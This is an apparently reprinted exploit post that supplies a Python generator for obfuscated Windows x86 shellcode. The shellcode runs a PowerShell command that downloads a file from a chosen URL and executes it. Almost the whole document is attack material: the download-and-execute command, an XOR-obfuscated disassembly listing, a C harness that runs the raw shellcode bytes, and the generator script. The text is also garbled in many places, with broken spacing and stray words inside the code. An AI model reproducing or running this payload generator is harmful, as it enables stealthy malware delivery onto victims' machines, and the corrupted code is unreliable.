< reprint >win X86-64-download & Execute (Generator)


#Title: obfuscated Shellcode Windows x86/x64 Download and Execute [use PowerShell]-generator#length:dynamic! depend on URL and filename#date:20 January 2015#author:ali razmjoo#tested on:windows 7 x64 ultimate#winexec = 0x77 b1e695#exitprocess = 0x77ae2acf#==================================== #Execute: #powershell-command "& {( New-object net.webclient). DownloadFile (' Http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe ', ' D:\Ali.exe ')};D: \ali.exe "#==== ================================ #Ali Razmjoo, [' [email protected] ', ' [email protected] '] #Thanks to my Friends, Dariush Nasirpour and Ehsan nezami#################################################### #How it work? " C:\users\ali\desktop>python "Windows x86 Download and execute.py" Enter urlexample:http://z3r0d4y.com/ File.exeenter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exeenter filenameexample:d:\ File.exeenter:c:\ali.exec:\users\ali\desktop>nasm-f elf Shellcode.asm-o Shellcode.oc:\users\ali\desktop>objdump-d shellcode.oshellcode.o:file format elf32-i386disassembly of section. 
text:0 0000000 <.text>: 0:31 C0 xor%eax,%eax 2:50 push%eax 3:6    8 $0x22654141 push 8:58 pop%eax 9:c1 E8 shr $0x8,%eax c:c1 E8 shr $0x8,%eax f:50 push%eax 10:b8 0b 4 D mov $0x4d0b4734,%eax 15:BB 5d 6e/mov $0x356e695d,%ebx 1a:31 d8 x or%ebx,%eax 1c:50 push%eax 1d:b8-ten mov $0x22103243,%eax 22:b                      b 6e 4e mov $0x4e516e79,%ebx 27:31 D8 xor%ebx,%eax 29:50 Push%eax 2a:b8, MOV $0x32420560,%eax 2f:bb, the Mov $0x71797849,%        EBX 34:31 D8           XOR%ebx,%eax 36:50 push%eax 37:B8 0f 1c 2c MOV $0x142c1c0f,%                      EAX 3C:BB 6a $0X3349646A,%EBX mov 41:31 D8 xor%ebx,%eax 43:50 Push%eax 44:b8 3e 0b mov $0x400b3e07,%eax 49:BB $6e mov $  0X6E625246,%EBX 4e:31 D8 xor%ebx,%eax 50:50 push%eax 51:b8 0a                   $0X7780A44,%EAX mov 56:bb 5b mov $0x5b424963,%ebx 5b:31 d8   XOR%ebx,%eax 5d:50 push%eax 5e:b8 0f 4b 0d mov $0xd4b160f,%eax 63:                      BB 6a 2d mov $0x2d67316a,%ebx 68:31 D8 xor%ebx,%eax 6a:50 Push%eax 6b:b8 5c 1f mov $0x1f5c6218,%eax 70:BB, 4c, all in MOV $0x67394c6     1,%EBX 75:31 D8              XOR%ebx,%eax 77:50 push%eax 78:B8 1b 2d 1e 1f mov $0x1f1e2d1                      B,%EAX 7D:BB 6b 6a 6b mov $0x6b6a586b,%ebx 82:31 D8 xor%ebx,%eax 84:50    Push%eax 85:B8 mov $0x66414045,%eax 8A:BB 3d  $0X4977783D,%EBX 8f:31 D8 xor%ebx,%eax 91:50 push%eax 92:b8 02                   1f 4b mov $0x454b1f02,%eax 97:BB 6d 6b 6a mov $0x6a386b6d,%ebx 9c:31 d8  XOR%ebx,%eax 9e:50 push%eax 9f:b8 3e mov $0x32193e24,%eax                      A4:BB 4e 6a 5a mov $0x5a6a4e45,%ebx a9:31 D8 xor%ebx,%eax ab:50 Push%EAX AC:B8 5e 3a/MOV $0x353a5e00,%eax B1:BB 6c $5b mov $0x5b 49736C,%EBX b6:31 D8                   XOR%ebx,%eax b8:50 push%eax b9:b8 1f Notoginseng mov $0x24   40371f,%eax be:bb 6d $0X4132526D,%EBX mov c3:31 D8 xor%ebx,%eax c5:          %eax c6:b8 2e $0x3168352e,%eax CB:BB 5a 4c 45 41   mov $0x41454c5a,%ebx d0:31 D8 xor%ebx,%eax d2:50 push%eax D3:                   B8 1e 1c, MOV $0x151c1e48,%eax D8:BB, 6e, $0X61696E67,%EBX 
mov dd:31 d8 XOR%ebx,%eax df:50 push%eax e0:b8 0d 5d mov $0x5d0d2826,                      %eax e5:bb 4f $0X3362454F,%EBX mov ea:31 D8 xor%ebx,%eax ec:50    Push%eax ed:b8 1d mov $0x451d5720,%eax F2:BB   $0X36637847,%EBX F7:D8 xor%ebx,%eax f9:50 push%eax FA:B8 6a 3b MOV $0x3b246a04,%eax FF:BB 4b $0x494b4477,%ebx 104:31 D8 xor%ebx,%eax 10          6:50 push%eax 107:b8 0f 0a mov $0x320a0f18,%eax 10C:BB 6c 6e 78 47 mov $0x47786e6c,%ebx 111:31 D8 xor%ebx,%eax 113:50 push%eax 11                   4:B8 7d 3c $0x273c187d,%eax mov 119:bb, 6c 5d, mov $0x555d6c52,%ebx 11e:31 d8 XOR%ebx,%eax 120:50 push%eax 121:b8, MOV $0x6060                       4403,%EAX 126:BB 5a 4f mov $0x4f5a3477,%ebx 12b:31 D8 xor%ebx,%eax 12d:50 Push%eax 12E:B8 6b 1f mov $0x201f6b47,%eax 133:BB 6f 4c + mo V $0X54774C6F,%EBX 138:31 D8 xor%ebx,%eax 13a:50 push%eax 13B:B8 2a 5e 2b mo V $0x202b5e2a,%eax 140:bb 6c PNS mov $0x4547376c,%ebx 145:31 D8 xor%ebx,%e          Ax 147:50 push%eax 148:b8 0e mov $0xe120759,%eax 14D:BB 6a mov $0x6a736835,%ebx 152:31 D8 xor%ebx,%eax 154:50 push%ea X 155:B8 2c mov $0x2c115901,%eax 15A:BB mov $0x42663645,%ebx 15f:31 D8 xor%ebx,%eax 161:50 push%eax 162:b8 4e 5a mov $0x   5a4e2222,%eax 167:BB 4c $0x7467564c,%ebx 16c:31 D8 xor%ebx,%eax 16e:          %EAX 16f:b8 1b, MOV $0x481b3700,%eax 174:BB 5b 2d MOV $0x2d725b43,%ebX 179:31 D8 xor%ebx,%eax 17b:50 push%eax 17C:B8 4a 1f 22 13 mov $0x13221f4a,%eax 181:BB (mov) $0x71474864,%ebx 186:31 D8 xor%eb X,%eax 188:50 push%eax 189:B8 6a mov $0x1803236a,%eax 18E:BB 4a 6d 6   6 6c mov $0x6c666d4a,%ebx 193:31 D8 xor%ebx,%eax 195:50 push   %eax 196:B8 2d 1c mov $0x1c57542d,%eax 19B:BB $0X68343147,%EBX 1a0:    D8 xor%ebx,%eax 1a2:50 push%eax 1a3:b8 4e 5a mov $0x5a36154e,%eax 1a8:bb $0x38793839,%ebx 1ad:31 D8 xor%ebx,%eax          1AF:50 Push%eax 1b0:b8 7f 1f mov $0x41f7f59,%eax 1B5:BB 79 57 51 61 MOV $0x61515779,%ebx 1ba:31 D8 xor%ebx,%eax 1bc:50 push%eax 1bd:b8 1d 2f    mov $0x2f1d5647,%eax 1c2:bb 3d $0X543D7065,%EBX mov 1c7:31 D8 xor 
%ebx,%eax 1c9:50 push%eax 1ca:b8 2c mov $0x5408182c,%eax 1CF:BB 4d 6c mov $0x746c764d,%ebx 1d4:31 d8 xor%ebx,%eax 1d6:50 p Ush%EAX 1D7:B8 5a 1b mov $0x1b58345a,%eax 1DC:BB 1 5b (mov $0x76355b39,%ebx) e1:31 D8 xor%ebx,%eax 1e3:50 push%eax 1e4:b8 3f 0f 4b m OV $0x414b0f3f,%eax 1E9:BB 6b 6c mov $0x6c6b6353,%ebx 1ee:31 D8 xor%ebx,%           EAX 1f0:50 push%eax 1F1:B8 4a 1e 0b mov $0xb591e4a,%eax 1f6:bb (6d) 6e MOV $0x6e316D38,%EBX 1fb:31 D8 xor%ebx,%eax 1fd:50 push%eax 1FE:B8 2b 2a mov $0x2a162b49,%eax 203:bb-4f mov $0x4f614439,%ebx 208:31 d8 xo R%ebx,%eax 20a:50 push%eax 20b:89 E0 mov%esp,%eax 20D:BB 41 41    $0x1414141,%ebx mov 212:c1 eb $0x8,%ebx shr 215:c1 eb                      $0X8,%EBX 218:c1 eb, shr $0x8,%ebx 21b:53 push%ebx 21c:50  Push%eax 21D:BB e6 B1 The $0X77B1E695,%EBX 222:ff D3 call *%EBX 224:BB CF 2a AE $0X77AE2ACF,%EBX mov 229:ff d3 call *%ebxc:\users\ali\desktop&gt ; #you have your shellcode now=======================================shellcode.c#include <stdio.h> #include < String.h>int Main () {UnsigneD Char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d \x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\ X79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\ X6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\ X31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\ Xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\ X50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\ Xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\ 
X48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\ x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\ x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\ X31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\ Xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\ X50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\ Xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\ X2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\ X7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\ X08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\ X41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\ X50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\    Xcf\x2a\xae\x77\xff\xd3 "; fprintf (stdout," Length:%d\n\n ", strlen (Shellcode)); (* (Void (*) ()) shellcode) ();} =======================================C:\USERS\ALI\DESKTOP&GT;GCC Shellcode.c-o shellcode.exeC:\Users\Ali\  Desktop>shellcode.exelength:173c:\users\ali\desktop> #notice: When program exit, you must wait 2-3 second, it'll Finish download and execute file after 2-3 second ' import random,binasciichars = ' Abcdefghijklmnopqrstuvwxyzabcdefghijk lmnopqrstuvwxyz123456789=[]-' P1 = ' xor eax,eaxpush eax ' ' p2 = ' mov eax,espmov ebx,0x01414141shr ebx,0x08shr ebx,0x08 SHR ebx,0x08push ebxpush Eaxmov ebx,0x77b1e695call 
ebxmov ebx,0x77ae2acfcall ebx "' sen1 = str (raw_input (' Enter url\ Nexample:http://z3r0d4y.com/file.exe \nenter: ')) Sen1 = Sen1.rsplit () Sen1 = Sen1[0]sen2 = str (raw_input (' Enter filename\nexample:d:\\file.exe\nenter: ')) Sen2 = Sen2.rsplit () sen2 = Sen2[0]sen = ' PowerShell -command "& {(New-object net.webclient).        DownloadFile ('%s ', '%s ')};%s ""% (sen1,sen2,sen2) m = 0for word in Sen:m + = 1m = M-1stack = ' while (m>=0):        Stack + = Sen[m] M-= 1stack = Stack.encode (' hex ') skip = 1if len (stack)% 8 = = 0:skip = 0if Skip is 1: stack = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0 if Skip is 1:sta                ck = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0 If Skip is 1:        stack = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0if len (stack)% 8 = = 0: Zxzxzxz = 0m = Len (stack)/8c = 0n = 0z = 8SHF = open (' Shellcode.asm ', ' W ') Shf.write (p1) shf.close () SHF = open (' Shellcod E.asm ', ' a ') while (c<m): v = ' push 0x ' + stack[n:z] Skip = 0 if ' 0x000000 ' in V:                Skip = 1 q1 = v[13:] v = ' push 0x ' + q1 + ' 414141 ' + ' \ n ' + ' pop eax\nshr ea X,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n ' if ' 0x0000 ' in v:skip = 1 q1 = v[11: ] v = ' push 0x ' + q1 + ' 4141 ' + ' \ n ' + ' pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n ' if ' 0x00 ' I n V:skip = 1 q1 = v[9:] v = ' push 0x ' + q1 + ' + ' + ' \ n ' + ' pop eax\nshr eax                , 0x08\npush eax\n ' If Skip is 1:shf.write (v) if skip is 0:v = V.rsplit () zzz = ' for W in V:if ' 0x ' in w:zzz =                 STR (w) S1 = Binascii.b2a_hex (". Join (Random.choice (chars) for I in range (4))) S1 = ' 0x%s '%% data = "%x"% (int (zzz, +) ^ int (s1, +)) v = ' mov Eax,0x%s\nmov ebx,%s\nxor eax,ebx\npus      H eax\n '% (DATA,S1)          Shf.write (v) n + = 8 z + 8 c + = 1shf.write (p2) shf.close () 

  


